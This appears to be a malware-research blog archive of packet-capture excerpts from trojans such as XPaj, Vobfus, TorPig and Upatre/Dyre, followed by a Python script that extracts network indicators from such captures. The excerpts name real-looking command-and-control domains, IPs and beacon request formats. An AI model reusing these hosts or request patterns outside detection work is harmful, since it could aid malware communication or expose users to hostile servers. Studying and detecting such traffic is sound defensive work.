Category Archives: Other Trojan Families

HISTORICAL Malware Sample – XPaj – Traffic Sample Indicators Analysis

2012-05-02 16:18:32.409570 IP 192.168.254.194.63550 > 208.91.198.30.80: Flags [.], seq 1:1437, ack 1, win 258, length 1436
E…R.@…L……[…>.PA….V\.P…….POST /DxODlv?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM&ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh HTTP/1.1
Host: nortiniolosto.com
Content-Length: 1279
Accept-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Pragma: no-cache
Cache-Control: no-cache
Connection:…


HISTORICAL Malware Sample – WordPress Motopy – Traffic Sample Indicators Analysis

2013-05-26 22:27:09.810961 IP 172.16.0.130.49165 > 95.163.104.69.80: Flags [P.], seq 1:262, ack 1, win 64240, length 261
E..-..@….d…._.hE.^M.Pk.:.x..xP…UN..POST /protocol.php?p=544355219&d=+ldPFacHQRWmAUMZtUAAHfFREUG1RAQdpWxDf6QFQhE= HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Content-Length: 782
User-Agent: –
Host: www.wholists.org
Connection: Keep-Alive
Cache-Control: no-cache
2013-05-26 22:27:09.811039 IP 95.163.104.69.80 > 172.16.0.130.49165: Flags [.], ack 262, win 64240, length 0
E..(.@……_.hE…..P.^Mx..xk.;.P…. ..
2013-05-26 22:27:09.811336 IP 172.16.0.130.49165…


HISTORICAL Malware Sample – Vobfus – Traffic Sample Indicators Analysis

2012-12-06 23:14:37.888322 IP 10.0.2.15.1039 > 10.0.2.3.53: 44216+ A? ns1.helpupdated.com. (37)
E..A.9….”b … ……5.-1…………..ns1.helpupdated.com…..
2012-12-06 23:14:37.896939 IP 10.0.2.3.53 > 10.0.2.15.1039: 44216 1/0/0 A 222.186.36.128 (53)
E..Q….@.b. … ….5…=g’………….ns1.helpupdated.com……………….$.
2012-12-06 23:14:38.406504 IP 10.0.2.15.1041 > 222.186.36.128.9003: Flags [S], seq 923729413, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0.:@….D …..$…#+7…….p……………
2012-12-06 23:14:38.725931 IP 222.186.36.128.9003 > 10.0.2.15.1041: Flags [S.], seq…


HISTORICAL Malware Sample – TorPig – Traffic Sample Indicators Analysis

2013-02-03 17:21:37.376029 IP 172.16.253.129.1044 > 66.240.236.39.80: Flags [P.], seq 1:264, ack 1, win 64240, length 263
E../.%@… …..B..’…P.nm..h$iP…….POST /search2?fr=altavista&itag=ody&q=20ada1700fce9c5798d0d8d65f2e6f9f%2Cc86d66b68cf91360&kgs=1&kls=0 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: annotatinggramma.info
Content-Length: 2816
Connection: Keep-Alive
Cache-Control: no-cache
2013-02-03 17:21:37.719029 IP 66.240.236.39.80 > 172.16.253.129.1044: Flags [P.], seq 1:1429, ack 3080, win 64240, length 1428
E………S.B..’…..P…h$i.ny%P….N..HTTP/1.1 200 OK
Server: nginx
Date: Thu, 15 Aug…


Phishing E-mail BreakingNews_pdf.exe Loads Upatre & Dyre X.509 SSL Certificate Malware PCAP Traffic Sample

2014-12-05 10:44:57.627969 IP 192.168.204.134.58400 > 192.168.204.2.53: 706+ A? muihoc[.]com. (28)
E..8…………….. .5.$……………muihoc[.]com…..
2014-12-05 10:44:57.905717 IP 192.168.204.2.53 > 192.168.204.134.58400: 706 1/0/0 A 123.30.128.103 (44)
E..H5&……………5. .4……………muihoc[.]com……………..{..g
2014-12-05 10:44:57.906500 IP 192.168.204.134.49258 > 123.30.128.103.80: Flags [S], seq 3427013587, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@…mQ….{..g.j.P.D…….. .%……………
2014-12-05 10:44:58.189785 IP 123.30.128.103.80 > 192.168.204.134.49258: Flags [S.], seq 1388600582,…
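Every excerpt in this archive is tcpdump -A text, and the indicators worth recording from each one (the DNS answer, the first SYN to a new host:port, the HTTP request line with its Host and User-Agent) can be pulled out mechanically rather than by eye. The following is an added example, not code from any of the original posts: it parses a constructed sample assembled from the XPaj and Vobfus excerpts above, skips the ASCII-dump lines, and returns the first sighting of each indicator in capture order. The regex names, the Indicator class and the SAMPLE text are the example's own.

```python
"""Extract DNS, TCP-connect and HTTP indicators from tcpdump -A text (added example)."""
import re
from dataclasses import dataclass

# One tcpdump summary line: timestamp, src.port > dst.port, then the protocol summary.
PKT_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) IP "
    r"(?P<src>\d+(?:\.\d+){3})\.(?P<sport>\d+) > "
    r"(?P<dst>\d+(?:\.\d+){3})\.(?P<dport>\d+): (?P<summary>.*)$")
DNS_Q_RE = re.compile(r"^(?P<txid>\d+)\+? A\? (?P<name>\S+?)\.? \(\d+\)$")
DNS_A_RE = re.compile(r"^(?P<txid>\d+) \d+/\d+/\d+ A (?P<ip>\d+(?:\.\d+){3}) \(\d+\)$")
# In -A output the request line is glued to the IP/TCP header bytes, so search, not match.
REQ_RE = re.compile(r"(?P<method>GET|POST|HEAD) (?P<uri>/\S*) HTTP/1\.[01]\s*$")
HDR_RE = re.compile(r"^(?P<name>[A-Za-z-]+): (?P<value>.*?)\s*$")

# Constructed sample assembled from the XPaj and Vobfus excerpts above; not a real capture file.
SAMPLE = r"""2012-05-02 16:18:32.409570 IP 192.168.254.194.63550 > 208.91.198.30.80: Flags [.], seq 1:1437, ack 1, win 258, length 1436
E...R.@...L......[...>.PA....V\.P.......POST /DxODlv?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM&ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh HTTP/1.1
Host: nortiniolosto.com
Content-Length: 1279
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0)
Connection: Keep-Alive
2012-12-06 23:14:37.888322 IP 10.0.2.15.1039 > 10.0.2.3.53: 44216+ A? ns1.helpupdated.com. (37)
E..A.9....b ... ......5.-1..............ns1.helpupdated.com.....
2012-12-06 23:14:37.896939 IP 10.0.2.3.53 > 10.0.2.15.1039: 44216 1/0/0 A 222.186.36.128 (53)
E..Q....@.b. ... ....5...=g'.............ns1.helpupdated.com..................$.
2012-12-06 23:14:38.406504 IP 10.0.2.15.1041 > 222.186.36.128.9003: Flags [S], seq 923729413, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0.:@....D .....$...#+7.......p..............
"""


@dataclass(frozen=True)
class Indicator:
    kind: str        # "dns", "tcp" or "http"
    value: str
    first_seen: str  # tcpdump timestamp of the packet it was taken from
    context: str = ""


def split_packets(text):
    """Group tcpdump -A lines into (header fields, payload lines) per packet."""
    packets = []
    for line in text.splitlines():
        m = PKT_RE.match(line)
        if m:
            packets.append((m.groupdict(), []))
        elif packets:                      # ASCII dump / header lines belong to the last packet
            packets[-1][1].append(line)
    return packets


def _http_from_payload(pkt, payload):
    """Return an http Indicator if this packet's payload carries a request line."""
    req = host = ua = None
    for line in payload:
        m = REQ_RE.search(line)
        if m and req is None:
            req = (m["method"], m["uri"])
            continue
        m = HDR_RE.match(line)             # never matches the binary-dump lines (no "Name: ")
        if m and m["name"].lower() == "host":
            host = m["value"]
        elif m and m["name"].lower() == "user-agent":
            ua = m["value"]
    if req is None:
        return None
    return Indicator("http", f"{req[0]} http://{host or pkt['dst']}{req[1]}", pkt["ts"],
                     f"dst={pkt['dst']}:{pkt['dport']} ua={ua}")


def extract_indicators(text):
    """Walk tcpdump -A output; return the first sighting of each indicator in capture order."""
    out, seen, pending_dns = [], set(), {}   # pending_dns maps DNS txid -> queried name

    def add(ind):
        if (ind.kind, ind.value) not in seen:
            seen.add((ind.kind, ind.value))
            out.append(ind)

    for pkt, payload in split_packets(text):
        s = pkt["summary"]
        if pkt["dport"] == "53" and (q := DNS_Q_RE.match(s)):
            pending_dns[q["txid"]] = q["name"]
        elif pkt["sport"] == "53" and (a := DNS_A_RE.match(s)):
            add(Indicator("dns", f"{pending_dns.pop(a['txid'], '?')} -> {a['ip']}", pkt["ts"]))
        elif s.startswith("Flags [S]"):      # bare SYN (not the [S.] reply) = new outbound connection
            add(Indicator("tcp", f"{pkt['dst']}:{pkt['dport']}", pkt["ts"],
                          "non-web port" if pkt["dport"] not in ("80", "443") else ""))
        if (h := _http_from_payload(pkt, payload)):
            add(h)
    return out


if __name__ == "__main__":
    for ind in extract_indicators(SAMPLE):
        print(f"{ind.first_seen}  {ind.kind:4}  {ind.value}  {ind.context}")
```

The DNS answer is tied back to its query by transaction id, since tcpdump's summary of the answer does not repeat the name; a request without a Host header falls back to the destination IP, and the context field flags SYNs to ports other than 80/443, which is how the 9003 connection in the Vobfus excerpt stands out. Defanged names such as `muihoc[.]com` in the Upatre/Dyre excerpt pass through the name regex unchanged.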
